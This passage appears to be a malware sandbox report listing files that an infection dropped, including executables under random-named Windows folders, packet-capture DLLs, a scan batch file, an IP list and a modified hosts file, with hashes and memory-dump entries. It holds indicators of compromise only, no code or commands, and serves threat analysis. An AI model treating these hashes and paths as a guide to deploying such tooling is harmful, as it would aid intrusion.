212ab45d123126e029e4d4baefbb70d1

SHA1
989f5734a80e645985e1d28b3f6606f154237cd7

SHA256
e851785967642a1733d7a8915608b1e1aa6fd94aebf8fae8c44baeb40ce754e8

SHA512
0064e4ce935cf62d69a9c2daab4a36b4fc131eeeac61c098ed7288845854ce3bf55902e0e53fbe3809d0e039782ec8e115272087823c734af6255f4061499bc7

Download Submit
C:\Windows\TEMP\yvccbdwlz\804.dmp

Filesize
3.4MB

MD5
2cc3dbe195cacfe606f3caab35b5743d

SHA1
7b08d5dc8eb413d609755f9c5630240fdab0cfce

SHA256
3b0aa29761d3799f2bc6644a97b50b71dd5be00ffe7d73bd15bc050a00c11e47

SHA512
5bca785eb39d6e50430f26c3f35c7148f72447a2378496522ea019bc3cf9e7ade39cb7c56cf3226b24c072b04ce1d3f3afaf09cb460c770bd5d7f7423c724d69

Download Submit
C:\Windows\Temp\bzlikjnbm\iljmvq.exe

Filesize
343KB

MD5
2b4ac7b362261cb3f6f9583751708064

SHA1
b93693b19ebc99da8a007fed1a45c01c5071fb7f

SHA256
a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23

SHA512
c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616

Download Submit
C:\Windows\Temp\xohudmc.exe

Filesize
72KB

MD5
cbefa7108d0cf4186cdf3a82d6db80cd

SHA1
73aeaf73ddd694f99ccbcff13bd788bb77f223db

SHA256
7c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9

SHA512
b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1

Download Submit
C:\Windows\Temp\yvccbdwlz\ctkyggczb.exe

Filesize
126KB

MD5
e8d45731654929413d79b3818d6a5011

SHA1
23579d9ca707d9e00eb62fa501e0a8016db63c7e

SHA256
a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af

SHA512
df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6

Download Submit
C:\Windows\ivwjddbm\biebucb.exe

Filesize
8.9MB

MD5
385a4f3316769f9aa680d50f5f4f46e6

SHA1
610d30ce47e2d95adef77a64b888d3b899cdfa3c

SHA256
6c88c32fd495aa12a32a4f2cdd034442eb61192feffcf742cab944a8e0f02b6f

SHA512
b681497821471277bc25eb00ee2518b3cb406a63b4bcd753d3de3f25545d65a68c1d5f1b4af5bb4ffbd706e175c719927ebec2614b0e8bbe059c6b6cc9286258

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
1KB

MD5
c838e174298c403c2bbdf3cb4bdbb597

SHA1
70eeb7dfad9488f14351415800e67454e2b4b95b

SHA256
1891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53

SHA512
c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376

Download Submit
C:\Windows\yvccbdwlz\Corporate\vfshost.exe

Filesize
381KB

MD5
fd5efccde59e94eec8bb2735aa577b2b

SHA1
51aaa248dc819d37f8b8e3213c5bdafc321a8412

SHA256
441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45

SHA512
74a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3

Download Submit
C:\Windows\yvccbdwlz\cttnbjmli\Packet.dll

Filesize
95KB

MD5
86316be34481c1ed5b792169312673fd

SHA1
6ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5

SHA256
49656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918

SHA512
3a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc

Download Submit
C:\Windows\yvccbdwlz\cttnbjmli\iiqtmdpdb.exe

Filesize
63KB

MD5
821ea58e3e9b6539ff0affd40e59f962

SHA1
635a301d847f3a2e85f21f7ee12add7692873569

SHA256
a06d135690ec5c5c753dd6cb8b4fe9bc8d23ca073ef9c0d8bb1b4b54271f56bb

SHA512
0d08235781b81ff9e0a75f0e220a8d368d95ee75bf482670e83696e59d991aad68310ae7fa677ac96ffad1f97b3ec7d7208dc26d2edb111c39213b32502b82f6

Download Submit
C:\Windows\yvccbdwlz\cttnbjmli\ip.txt

Filesize
193B

MD5
b60665323534ba46727ebf682f619cbf

SHA1
4a64a67e5e58141152b91728ae6140f31d1670c1

SHA256
b304969bb2594e86bdb8ab58dfed49c1c65a320a1523a31db3054e060bc0017a

SHA512
f113a279ee44c081cd4788c0dc6a0dd22a1f95d3e1621287b79a856670688a7628b41764b34b235ae0e5d7856550dc7f0b71dafc7177b9ffba6e5dd9c753dbf7

Download Submit
C:\Windows\yvccbdwlz\cttnbjmli\lvnuplabi.exe

Filesize
332KB

MD5
ea774c81fe7b5d9708caa278cf3f3c68

SHA1
fc09f3b838289271a0e744412f5f6f3d9cf26cee

SHA256
4883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38

SHA512
7cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb

Download Submit
C:\Windows\yvccbdwlz\cttnbjmli\scan.bat

Filesize
159B

MD5
e681115ed15892a7f12189bc80ca37fe

SHA1
5be1b4de91924716420fce71c7d8386917f1657d

SHA256
01f35c232f8a14ebfbdf29002866b8aa5a7a0eb63aafc2d056e656f9468dfc43

SHA512
378935e5db60777b4703d70d1825cdfa9ff47d570ce93ac0c8fd622b7c99015f739e108a4f015305a0ac7bf2965e8a39bf792b2b3731cacdb8b65c916c0d3712

Download Submit
C:\Windows\yvccbdwlz\cttnbjmli\wpcap.dll

Filesize
275KB

MD5
4633b298d57014627831ccac89a2c50b

SHA1
e5f449766722c5c25fa02b065d22a854b6a32a5b

SHA256
b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9

SHA512
29590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3

Download Submit
C:\Windows\yvccbdwlz\cttnbjmli\wpcap.exe

Filesize
424KB

MD5
e9c001647c67e12666f27f9984778ad6

SHA1
51961af0a52a2cc3ff2c4149f8d7011490051977

SHA256
7ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d

SHA512
56f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe

Download Submit
memory/1516-147-0x00007FF7C78D0000-0x00007FF7C792B000-memory.dmp

Filesize
364KB

Download
memory/1608-195-0x00007FF7C78D0000-0x00007FF7C792B000-memory.dmp

Filesize
364KB

Download
memory/1920-130-0x00007FF7C78D0000-0x00007FF7C792B000-memory.dmp

Filesize
364KB

Download
memory/2176-125-0x00007FF7C78D0000-0x00007FF7C792B000-memory.dmp

Filesize
364KB

Download
memory/2324-174-0x00007FF7C78D0000-0x00007FF7C792B000-memory.dmp

Filesize
364KB

Download
memory/2336-110-0x00007FF7C78D0000-0x00007FF7C792B000-memory.dmp

Filesize
364KB

Download
memory/2336-209-0x0000000000D10000-0x0000000000D22000-memory.dmp

Filesize
72KB

Download
memory/2336-92-0x00007FF7C78D0000-0x00007FF7C792B000-memory.dmp

Filesize
364KB

Download
memory/2400-8-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/3064-191-0x00007FF7C78D0000-0x00007FF7C792B000-memory.dmp

Filesize
364KB

Download
memory/3076-28-0x0000000001850000-0x000000000189C000-memory.dmp

Filesize
304KB

Download
memory/3120-161-0x00007FF7C78D0000-0x00007FF7C792B000-memory.dmp

Filesize
364KB

Download
memory/3172-135-0x00007FF7C78D0000-0x00007FF7C792B000-memory.dmp

Filesize
364KB

Download
memory/3452-139-0x00007FF7C78D0000-0x00007FF7C792B000-memory.dmp

Filesize
364KB

Download
memory/3720-0-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/3720-4-0x0000000000400000-0x0000000000A9B000-memory.dmp

Filesize
6.6MB

Download
memory/3820-152-0x00007FF7C78D0000-0x00007FF7C792B000-memory.dmp

Filesize
364KB

Download
memory/3832-178-0x00007FF7C78D0000-0x00007FF7C792B000-memory.dmp

Filesize
364KB

Download
memory/4188-99-0x0000000010000000-0x0000000010008000-memory.dmp

Filesize
32KB

Download
memory/4188-112-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/4212-156-0x00007FF7C78D0000-0x00007FF7C792B000-memory.dmp

Filesize
364KB

Download
memory/4312-85-0x00007FF774E50000-0x00007FF774F3E000-memory.dmp

Filesize
952KB

Download
memory/4312-88-0x00007FF774E50000-0x00007FF774F3E000-memory.dmp

Filesize
952KB

Download
memory/4460-121-0x00007FF7C78D0000-0x00007FF7C792B000-memory.dmp

Filesize
364KB

Download
memory/4460-165-0x00007FF7C78D0000-0x00007FF7C792B000-memory.dmp

Filesize
364KB

Download
memory/4900-143-0x00007FF7C78D0000-0x00007FF7C792B000-memory.dmp

Filesize
364KB

Download
memory/4916-183-0x00007FF7C78D0000-0x00007FF7C792B000-memory.dmp

Filesize
364KB

Download
memory/4956-169-0x00007FF7C78D0000-0x00007FF7C792B000-memory.dmp

Filesize
364KB

Download
memory/5040-171-0x00007FF6515D0000-0x00007FF6516F0000-memory.dmp

Filesize
1.1MB

Download
memory/5040-160-0x00007FF6515D0000-0x00007FF6516F0000-memory.dmp

Filesize
1.1MB

Download
memory/5040-127-0x00007FF6515D0000-0x00007FF6516F0000-memory.dmp

Filesize
1.1MB

Download
memory/5040-115-0x00007FF6515D0000-0x00007FF6516F0000-memory.dmp

Filesize
1.1MB

Download
memory/5040-149-0x00007FF6515D0000-0x00007FF6516F0000-memory.dmp

Filesize
1.1MB

Download
memory/5040-132-0x00007FF6515D0000-0x00007FF6516F0000-memory.dmp

Filesize
1.1MB

Download
memory/5040-118-0x000001CD1E840000-0x000001CD1E850000-memory.dmp

Filesize
64KB

Download
memory/5040-180-0x00007FF6515D0000-0x00007FF6516F0000-memory.dmp

Filesize
1.1MB

Download
memory/5040-211-0x00007FF6515D0000-0x00007FF6516F0000-memory.dmp

Filesize
1.1MB

Download
memory/5040-218-0x00007FF6515D0000-0x00007FF6516F0000-memory.dmp

Filesize
1.1MB

Download
memory/5040-224-0x00007FF6515D0000-0x00007FF6516F0000-memory.dmp

Filesize
1.1MB

Download
memory/5040-241-0x00007FF6515D0000-0x00007FF6516F0000-memory.dmp

Filesize
1.1MB

Download
memory/5040-242-0x00007FF6515D0000-0x00007FF6516F0000-memory.dmp

Filesize
1.1MB

Download
memory/5040-244-0x00007FF6515D0000-0x00007FF6516F0000-memory.dmp

Filesize
1.1MB

Download